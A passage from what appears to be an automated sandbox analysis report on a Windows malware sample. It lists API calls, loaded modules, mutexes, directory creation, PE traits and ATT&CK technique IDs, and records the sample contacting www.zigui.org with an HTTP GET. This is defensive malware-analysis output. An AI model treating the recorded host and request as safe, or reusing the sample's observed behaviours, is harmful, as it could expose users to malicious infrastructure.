parameter LpkEditControl (UID: 00000000-00005204)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter ObjectStublessClient10 (UID: 00000000-00005204)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter DeactivateActCtx (UID: 00000000-00005204)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter getaddrinfo (UID: 00000000-00005204)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter getnameinfo (UID: 00000000-00005204)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter freeaddrinfo (UID: 00000000-00005204)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter WSASocketA (UID: 00000000-00005204)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter WSASend (UID: 00000000-00005204)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter WSARecv (UID: 00000000-00005204)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "mutant-0", "type": 4, "relevance": 3, "name": "Creates mutants", "description": "\"\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesCacheCounterMutex\"\n \"\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesLockedCacheCounterMutex\"\n \"Local\\ZonesCacheCounterMutex\"\n \"Local\\ZonesLockedCacheCounterMutex\"", "origin": "Created Mutant"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-8", "type": 6, "relevance": 1, "name": "Looks up procedures from modules (excluding apphelp.dll, kernel32.dll, user32.dll, gdi32.dll, ole32.dll, comctl32.dll, uxtheme.dll, oleaut32.dll, version.dll, msctfime.ime)", "description": "\"15001600c03e7e6a@ADVAPI32.dll\"\n \"0e000f00703f7e6a@ADVAPI32.dll\"\n \"0e000f00cc3f7e6a@ADVAPI32.dll\"\n \"11001200b4477e6a@ADVAPI32.dll\"\n \"1100120048487e6a@ADVAPI32.dll\"\n \"120013008c487e6a@ADVAPI32.dll\"\n \"12001300e4487e6a@ADVAPI32.dll\"\n \"14001500386e7e6a@ADVAPI32.dll\"\n \"14001500506e7e6a@ADVAPI32.dll\"\n \"14001500686e7e6a@ADVAPI32.dll\"\n \"17001800806e7e6a@ADVAPI32.dll\"\n \"0d000e00986e7e6a@ADVAPI32.dll\"\n \"11001200a86e7e6a@ADVAPI32.dll\"\n \"11001200bc6e7e6a@ADVAPI32.dll\"\n \"0d000e0044667e6a@WININET.dll\"\n \"0d000e00b4667e6a@WININET.dll\"\n \"10001100ec667e6a@WININET.dll\"\n \"1000110090677e6a@WININET.dll\"\n \"10001100006f7e6a@WININET.dll\"\n \"10001100146f7e6a@WININET.dll\"\n \"14001500286f7e6a@WININET.dll\"\n \"14001500406f7e6a@WININET.dll\"\n \"12001300586f7e6a@WININET.dll\"\n \"120013006c6f7e6a@WININET.dll\"\n \"10001100d0677e6a@WININET.dll\"", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-625", "type": 2, "relevance": 1, "name": "References Windows filepaths for DLLs (possible dropped files)", "description": "Observed system executable string:\"%WINDIR%\\system32\\apphelp.dll\" [Source: 00000000-00000892-0000018F-2247585]\n Observed system executable string:\"%WINDIR%\\system32\\uxtheme.dll\" [Source: 00000000-00000892-00000C28-4237031252]\n Observed system executable string:\"%WINDIR%\\system32\\ole32.dll\" [Source: 00000000-00000892-00000C28-4238040284]\n Observed system executable string:\"%WINDIR%\\system32\\MSCTF.dll\" [Source: 00000000-00000892-00000C28-4238333847]", "origin": "File/Memory", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-122", "type": 6, "relevance": 3, "name": "Calls an API typically used to create a directory", "description": "\"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d.exe\" called \"CreateDirectoryA\" with parameter %WINDIR%\\system\\ (UID: 00000000-00000892)\n \"rundll32.exe\" called \"CreateDirectoryW\" with parameter C:\\Users\\%OSUSER% (UID: 00000000-00005204)\n \"rundll32.exe\" called \"CreateDirectoryW\" with parameter %USERPROFILE%\\AppData\\Local (UID: 00000000-00005204)\n \"rundll32.exe\" called \"CreateDirectoryW\" with parameter %LOCALAPPDATA%\\Microsoft\\Windows\\Temporary Internet Files (UID: 00000000-00005204)\n \"rundll32.exe\" called \"CreateDirectoryW\" with parameter %USERPROFILE%\\AppData\\Roaming (UID: 00000000-00005204)\n \"rundll32.exe\" called \"CreateDirectoryW\" with parameter %APPDATA%\\Microsoft\\Windows\\Cookies (UID: 00000000-00005204)\n \"rundll32.exe\" called \"CreateDirectoryW\" with parameter %LOCALAPPDATA%\\Microsoft\\Windows\\History (UID: 00000000-00005204)", "origin": "API Call", "attck_id": "T1074.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074/001"}, {"threat_level_human": "informative", "category": "General", "identifier": "registry-72", "type": 3, "relevance": 3, "name": "Overview of unique CLSIDs touched in registry", "description": "\"rundll32.exe\" touched \"WinInetBroker Class\" (Path: \"HKCU\\CLSID\\{C39EE728-D419-4BD4-A3EF-EDA059DBD935}\")\n \"rundll32.exe\" touched \"PSFactoryBuffer\" (Path: \"HKCU\\CLSID\\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\")\n \"rundll32.exe\" touched \"Network List Manager\" (Path: \"HKCU\\CLSID\\{A47979D2-C419-11D9-A5B4-001185AD2B89}\\LOCALSERVER32\")\n \"rundll32.exe\" touched \"NetworkListManager\" (Path: \"HKLM\\SOFTWARE\\CLASSES\\CLSID\\{DCB00C01-570F-4A9B-8D69-199FDBA5723B}\")", "origin": "Registry Access", "attck_id": "T1546.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/015"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-128", "type": 6, "relevance": 5, "name": "Calls an API typically used to create a process", "description": "\"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d.exe\" called \"CreateProcessA\" with parameter \"%WINDIR%\\system\\rundll32.exe\" - (UID: 00000000-00000892)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-550", "type": 2, "relevance": 1, "name": "Contains ability to find and load resources of specific modules (API string)", "description": "Found reference to API \"16178828581,1512,3136,,FindResourceA,kernel32.dll,\"253:19:34.530\",RX=0,PX=0\" (Indicator: \"FindResource\"; Source: \"00000000-00005204.00000001.334759.002D0000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-153", "name": "Uses 32 bit executable PE", "description": "\"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"_.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"notepad_.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"RUNDLL32.EXE.67A47BFB.bin\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-70", "type": 6, "relevance": 10, "name": "Scanning for window names", "description": "\"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d.exe\" searching for class \"#32770\"", "origin": "API Call", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-96", "name": "PE file entrypoint instructions", "description": "\"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d\" file has an entrypoint instructions - \"push\tebp,mov\tebp, esp,push\t-1,push\t0x40b5d8,push\t0x40a4d6,mov\teax, dword ptr fs:[0],push\teax,mov\tdword ptr fs:[0], esp,sub\tesp, 0x68,push\tebx,push\tesi,push\tedi,mov\tdword ptr [ebp - 0x18], esp,xor\tebx, ebx,mov\tdword ptr [ebp - 4], ebx,push\t2,call\tdword ptr [0x40b210],pop\tecx,or\tdword ptr [0x40e6b0], 0xffffffff,or\tdword ptr [0x40e6b4], 0xffffffff,call\tdword ptr [0x40b214],mov\tecx, dword ptr [0x40e6a4],mov\tdword ptr [eax], ecx,call\tdword ptr [0x40b218],mov\tecx, dword ptr [0x40e6a0],mov\tdword ptr [eax], ecx,mov\teax, dword ptr [0x40b21c],\"\n \"_.exe\" file has an entrypoint instructions - \"push\tebp,mov\tebp, esp,push\t-1,push\t0x40b5d8,push\t0x40a4d6,mov\teax, dword ptr fs:[0],push\teax,mov\tdword ptr fs:[0], esp,sub\tesp, 0x68,push\tebx,push\tesi,push\tedi,mov\tdword ptr [ebp - 0x18], esp,xor\tebx, ebx,mov\tdword ptr [ebp - 4], ebx,push\t2,call\tdword ptr [0x40b210],pop\tecx,or\tdword ptr [0x40e6b0], 0xffffffff,or\tdword ptr [0x40e6b4], 0xffffffff,call\tdword ptr [0x40b214],mov\tecx, dword ptr [0x40e6a4],mov\tdword ptr [eax], ecx,call\tdword ptr [0x40b218],mov\tecx, dword ptr [0x40e6a0],mov\tdword ptr [eax], ecx,mov\teax, dword ptr [0x40b21c],\"\n \"notepad_.exe\" file has an entrypoint instructions - \"push\tebp,mov\tebp, esp,push\t-1,push\t0x40b5d8,push\t0x40a4d6,mov\teax, dword ptr fs:[0],push\teax,mov\tdword ptr fs:[0], esp,sub\tesp, 0x68,push\tebx,push\tesi,push\tedi,mov\tdword ptr [ebp - 0x18], esp,xor\tebx, ebx,mov\tdword ptr [ebp - 4], ebx,push\t2,call\tdword ptr [0x40b210],pop\tecx,or\tdword ptr [0x40e6b0], 0xffffffff,or\tdword ptr [0x40e6b4], 0xffffffff,call\tdword ptr [0x40b214],mov\tecx, dword ptr [0x40e6a4],mov\tdword ptr [eax], ecx,call\tdword ptr [0x40b218],mov\tecx, dword ptr [0x40e6a0],mov\tdword ptr [eax], ecx,mov\teax, dword ptr [0x40b21c],\"\n \"RUNDLL32.EXE.67A47BFB.bin\" file has an entrypoint instructions - \"push\tebp,mov\tebp, esp,push\t-1,push\t0x40b5d8,push\t0x40a4d6,mov\teax, dword ptr fs:[0],push\teax,mov\tdword ptr fs:[0], esp,sub\tesp, 0x68,push\tebx,push\tesi,push\tedi,mov\tdword ptr [ebp - 0x18], esp,xor\tebx, ebx,mov\tdword ptr [ebp - 4], ebx,push\t2,call\tdword ptr [0x40b210],pop\tecx,or\tdword ptr [0x40e6b0], 0xffffffff,or\tdword ptr [0x40e6b4], 0xffffffff,call\tdword ptr [0x40b214],mov\tecx, dword ptr [0x40e6a4],mov\tdword ptr [eax], ecx,call\tdword ptr [0x40b218],mov\tecx, dword ptr [0x40e6a0],mov\tdword ptr [eax], ecx,mov\teax, dword ptr [0x40b21c],\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "stream-108", "type": 1, "relevance": 3, "name": "Contains ability to dynamically load libraries", "description": "LoadLibraryA@KERNEL32.dll at 13525-108-00405290\n LoadLibraryA@KERNEL32.dll at 13525-99-004047D0\n LoadLibraryA@KERNEL32.dll at 13525-97-00404B90\n LoadLibraryA@KERNEL32.DLL at 00000000-00000892-16261-63-00405000\n LoadLibraryA@KERNEL32.DLL at 00000000-00000892-16261-26-00404B90\n LoadLibraryA@KERNEL32.DLL at 00000000-00000892-16261-28-004047D0\n LoadLibraryA@KERNEL32.DLL at 00000000-00000892-16261-105-00408D00\n LoadLibraryA@KERNEL32.DLL at 00000000-00000892-16261-65-00404F40\n LoadLibraryA@KERNEL32.DLL at 00000000-00000892-16261-37-00405290", "origin": "Hybrid Analysis Technology", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-7", "type": 6, "relevance": 1, "name": "Loads modules at runtime", "description": "\"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d.exe\" loaded module \"KERNEL32.DLL\" at base 77030000\n \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75450000\n \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d.exe\" loaded module \"ADVAPI32.DLL\" at base 76dd0000\n \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d.exe\" loaded module \"%WINDIR%\\SYSTEM32\\UXTHEME.DLL\" at base 743f0000\n \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d.exe\" loaded module \"DWMAPI.DLL\" at base 73e10000\n \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d.exe\" loaded module \"%WINDIR%\\SYSTEM32\\OLE32.DLL\" at base 76c70000\n \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d.exe\" loaded module \"CRYPTBASE.DLL\" at base 754a0000\n \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d.exe\" loaded module \"CLBCATQ.DLL\" at base 77850000\n \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d.exe\" loaded module \"%WINDIR%\\SYSTEM32\\MSCTF.DLL\" at base 77430000\n \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d.exe\" loaded module \"OLEAUT32.DLL\" at base 771d0000\n \"rundll32.exe\" loaded module \"ADVAPI32.DLL\" at base 76dd0000\n \"rundll32.exe\" loaded module \"KERNEL32.DLL\" at base 77030000\n \"rundll32.exe\" loaded module \"SECUR32.DLL\" at base 752e0000\n \"rundll32.exe\" loaded module \"RPCRT4.DLL\" at base 77280000\n \"rundll32.exe\" loaded module \"SHELL32.DLL\" at base 75940000\n \"rundll32.exe\" loaded module \"OLE32.DLL\" at base 76c70000\n \"rundll32.exe\" loaded module \"API-MS-WIN-SECURITY-SDDL-L1-1-0.DLL\" at base 76920000\n \"rundll32.exe\" loaded module \"PROFAPI.DLL\" at base 755b0000\n \"rundll32.exe\" loaded module \"API-MS-WIN-DOWNLEVEL-OLE32-L1-1-0.DLL\" at base 756b0000\n \"rundll32.exe\" loaded module \"API-MS-WIN-DOWNLEVEL-ADVAPI32-L2-1-0.DLL\" at base 703f0000\n \"rundll32.exe\" loaded module \"URLMON.DLL\" at base 76590000\n \"rundll32.exe\" loaded module \"%WINDIR%\\SYSTEM32\\UXTHEME.DLL\" at base 743f0000\n \"rundll32.exe\" loaded module \"API-MS-WIN-DOWNLEVEL-SHLWAPI-L2-1-0.DLL\" at base 71fc0000\n \"rundll32.exe\" loaded module \"WS2_32.DLL\" at base 76f50000\n \"rundll32.exe\" loaded module \"WINHTTP.DLL\" at base 71940000\n \"rundll32.exe\" loaded module \"%WINDIR%\\SYSTEM32\\MSWSOCK.DLL\" at base 74f70000\n \"rundll32.exe\" loaded module \"%WINDIR%\\SYSTEM32\\WSHIP6.DLL\" at base 74f60000\n \"rundll32.exe\" loaded module \"IPHLPAPI.DLL\" at base 73900000\n \"rundll32.exe\" loaded module \"OLEAUT32.DLL\" at base 771d0000\n \"rundll32.exe\" loaded module \"DNSAPI.DLL\" at base 74e30000\n \"rundll32.exe\" loaded module \"CRYPTBASE.DLL\" at base 754a0000\n \"rundll32.exe\" loaded module \"CLBCATQ.DLL\" at base 77850000\n \"rundll32.exe\" loaded module \"DHCPCSVC6.DLL\" at base 73810000\n \"rundll32.exe\" loaded module \"%WINDIR%\\SYSTEM32\\NETPROFM.DLL\" at base 6d4d0000\n \"rundll32.exe\" loaded module \"DHCPCSVC.DLL\" at base 73790000\n \"rundll32.exe\" loaded module \"%WINDIR%\\SYSTEM32\\WSHTCPIP.DLL\" at base 74ad0000\n \"rundll32.exe\" loaded module \"RASADHLP.DLL\" at base 719a0000\n \"rundll32.exe\" loaded module \"API-MS-WIN-SECURITY-LSALOOKUP-L1-1-0.DLL\" at base 76920000\n \"rundll32.exe\" loaded module \"CRYPTSP.DLL\" at base 74fb0000\n \"rundll32.exe\" loaded module \"%WINDIR%\\SYSTEM32\\RSAENH.DLL\" at base 74d40000\n \"rundll32.exe\" loaded module \"RPCRTREMOTE.DLL\" at base 75540000\n \"rundll32.exe\" loaded module \"%WINDIR%\\SYSTEM32\\NPMPROXY.DLL\" at base 6c3b0000\n \"rundll32.exe\" loaded module \"%WINDIR%\\SYSTEM32\\OLEAUT32.DLL\" at base 771d0000\n \"rundll32.exe\" loaded module \"%WINDIR%\\SYSTEM32\\WININET.DLL\" at base 769c0000\n \"rundll32.exe\" loaded module \"%WINDIR%\\SYSTEM32\\FWPUCLNT.DLL\" at base 73830000\n \"rundll32.exe\" loaded module \"COMCTL32.DLL\" at base 74470000\n \"rundll32.exe\" loaded module \"%WINDIR%\\SYSTEM32\\WS2_32\" at base 76f50000", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-175", "type": 6, "relevance": 1, "name": "Calls an API typically used to load libraries", "description": "\"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d.exe\" called \"LoadLibrary\" with a parameter KERNEL32.DLL (UID: 00000000-00000892)\n \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00000892)\n \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00000892)\n \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00000892)\n \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\ole32.dll (UID: 00000000-00000892)\n \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\MSCTF.dll (UID: 00000000-00000892)\n \"rundll32.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00005204)\n \"rundll32.exe\" called \"LoadLibrary\" with a parameter Secur32.dll (UID: 00000000-00005204)\n \"rundll32.exe\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00005204)\n \"rundll32.exe\" called \"LoadLibrary\" with a parameter api-ms-win-downlevel-ole32-l1-1-0.dll (UID: 00000000-00005204)\n \"rundll32.exe\" called \"LoadLibrary\" with a parameter api-ms-win-downlevel-advapi32-l2-1-0.dll (UID: 00000000-00005204)\n \"rundll32.exe\" called \"LoadLibrary\" with a parameter urlmon.dll (UID: 00000000-00005204)\n \"rundll32.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00005204)\n \"rundll32.exe\" called \"LoadLibrary\" with a parameter api-ms-win-downlevel-shlwapi-l2-1-0.dll (UID: 00000000-00005204)\n \"rundll32.exe\" called \"LoadLibrary\" with a parameter WS2_32.dll (UID: 00000000-00005204)\n \"rundll32.exe\" called \"LoadLibrary\" with a parameter winhttp.dll (UID: 00000000-00005204)\n \"rundll32.exe\" called \"LoadLibrary\" with a parameter IPHLPAPI.DLL (UID: 00000000-00005204)\n \"rundll32.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.dll (UID: 00000000-00005204)\n \"rundll32.exe\" called \"LoadLibrary\" with a parameter DNSAPI.dll (UID: 00000000-00005204)\n \"rundll32.exe\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00005204)\n \"rundll32.exe\" called \"LoadLibrary\" with a parameter dhcpcsvc.DLL (UID: 00000000-00005204)\n \"rundll32.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Security-LSALookup-L1-1-0.dll (UID: 00000000-00005204)\n \"rundll32.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00005204)\n \"rundll32.exe\" called \"LoadLibrary\" with a parameter Comctl32.dll (UID: 00000000-00005204)\n \"rundll32.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\ws2_32 (UID: 00000000-00005204)", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-10", "type": 10, "name": "Loads the RPC (Remote Procedure Call) module DLL", "description": "\"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 77280000\n \"rundll32.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 77280000", "origin": "Loaded Module", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-2", "type": 9, "name": "An application crash occurred", "description": "Report process \"WerFault.exe\" was created by \"svchost.exe\"", "origin": "Monitored Target"}, {"threat_level_human": "informative", "category": "General", "identifier": "network-1", "type": 7, "relevance": 1, "name": "Contacts server", "description": "\"<IPv4>:80\"", "origin": "Network Traffic", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}, {"threat_level_human": "informative", "category": "General", "identifier": "network-0", "type": 7, "relevance": 1, "name": "Contacts domains", "description": "\"www.zigui.org\"", "origin": "Network Traffic", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}, {"threat_level_human": "informative", "category": "General", "identifier": "registry-25", "type": 3, "relevance": 3, "name": "Reads information about supported languages", "description": "\"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN-US\")\n \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"EN-US\")\n \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\LOCALE\"; Key: \"00000409\")\n \"rundll32.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN-US\")\n \"rundll32.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"EN-US\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "General", "identifier": "network-2", "type": 7, "relevance": 5, "name": "GETs files from a webserver", "description": "\"GET /article.php?id=103822 HTTP/1.1\nAccept: */*\nAccept-Encoding: gzip, deflate\nUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)\nHost: www.zigui.org\nConnection: Keep-Alive\" Response ==> HTTP/1.1 400 Bad Request\nContent-Type: text/html\nDate: Thu\n 06 Feb 2025 09:05:30 GMT\nConnection: close\nContent-Length: 39 with response body ==>3C68313E42616420526571756573742028496E76616C696420486F73746E616D65293C2F68313E.......", "origin": "Network Traffic", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001"}, {"threat_level_human": "informative", "category": "General", "identifier": "network-51", "type": 7, "relevance": 1, "name": "Queries DNS server", "description": "\"www.zigui.org\"", "origin": "Network Traffic", "attck_id": "T1071.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/004"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-25", "type": 9, "relevance": 3, "name": "Spawns new processes", "description": "Spawned process \"rundll32.exe\" (UID: 00000000-00005204)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-80", "relevance": 1, "name": "PE file contains executable sections", "description": "\"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d\" has an executable section named \"\"\n \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d\" has an executable section named \".PEC\"\n \"_.exe\" has an executable section named \"\"\n \"_.exe\" has an executable section named \".PEC\"\n \"notepad_.exe\" has an executable section named \"\"\n \"notepad_.exe\" has an executable section named \".PEC\"\n \"RUNDLL32.EXE.67A47BFB.bin\" has an executable section named \"\"\n \"RUNDLL32.EXE.67A47BFB.bin\" has an executable section named \".PEC\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-95", "name": "PE file contains writable sections", "description": "\"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d\" has an writable section named \"\"\n \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d\" has an writable section named \".rsrc\"\n \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d\" has an writable section named \".PEC\"\n \"_.exe\" has an writable section named \"\"\n \"_.exe\" has an writable section named \".rsrc\"\n \"_.exe\" has an writable section named \".PEC\"\n \"notepad_.exe\" has an writable section named \"\"\n \"notepad_.exe\" has an writable section named \".rsrc\"\n \"notepad_.exe\" has an writable section named \".PEC\"\n \"RUNDLL32.EXE.67A47BFB.bin\" has an writable section named \"\"\n \"RUNDLL32.EXE.67A47BFB.bin\" has an writable section named \".rsrc\"\n \"RUNDLL32.EXE.67A47BFB.bin\" has an writable section named \".PEC\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-103", "type": 9, "relevance": 3, "name": "Spawns new processes that are not known child processes", "description": "Spawned process \"rundll32.exe\" (UID: 00000000-00005204)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-157", "name": "Matched Compiler/Packer signature (DIE)", "description": "\"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d\" was detected as \"MFC\" and name: \"Library\"\n \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d\" was detected as \"EP:Microsoft Visual C/C++\" and name: \"Compiler\"\n \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d\" was detected as \"Microsoft Visual C++\" and name: \"Compiler\"\n \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"_.exe\" was detected as \"MFC\" and name: \"Library\"\n \"_.exe\" was detected as \"EP:Microsoft Visual C/C++\" and name: \"Compiler\"\n \"_.exe\" was detected as \"Microsoft Visual C++\" and name: \"Compiler\"\n \"_.exe\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"notepad_.exe\" was detected as \"MFC\" and name: \"Library\"\n \"notepad_.exe\" was detected as \"EP:Microsoft Visual C/C++\" and name: \"Compiler\"\n \"notepad_.exe\" was detected as \"Microsoft Visual C++\" and name: \"Compiler\"\n \"notepad_.exe\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"RUNDLL32.EXE.67A47BFB.bin\" was detected as \"MFC\" and name: \"Library\"\n \"RUNDLL32.EXE.67A47BFB.bin\" was detected as \"EP:Microsoft Visual C/C++\" and name: \"Compiler\"\n \"RUNDLL32.EXE.67A47BFB.bin\" was detected as \"Microsoft Visual C++\" and name: \"Compiler\"\n \"RUNDLL32.EXE.67A47BFB.bin\" was detected as \"Microsoft Linker\" and name: \"Linker\"", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-79", "relevance": 1, "name": "Contains ability to dynamically determine API calls", "description": "Found GetProcAddress() and LoadLibraryA() in an import section (Source: 5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d)\n Found GetProcAddress() and LoadLibraryA() in an import section (Source: _.exe)\n Found GetProcAddress() and LoadLibraryA() in an import section (Source: notepad_.exe)\n Found GetProcAddress() and LoadLibraryA() in an import section (Source: RUNDLL32.EXE.67A47BFB.bin)", "origin": "Static Parser", "attck_id": "T1027.007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/007"}, {"threat_level_human": "informative", "category": "General", "identifier": "stream-103", "type": 1, "relevance": 3, "name": "Contains ability to delay the execution of current thread", "description": "Sleep@KERNEL32.dll at 13525-109-00405440\n Sleep@KERNEL32.dll at 13525-103-004085A0\n Sleep@KERNEL32.dll at 13525-94-004086F0\n SetTimer at 00000000-00000892-16261-104-00401300\n Sleep@KERNEL32.DLL at 00000000-00000892-16261-38-00405440\n Sleep@KERNEL32.DLL at 00000000-00000892-16261-23-004086F0\n Sleep@KERNEL32.DLL at 00000000-00000892-16261-32-004085A0", "origin": "Hybrid Analysis Technology", "attck_id": "T1497.003", "attck_id_wiki": 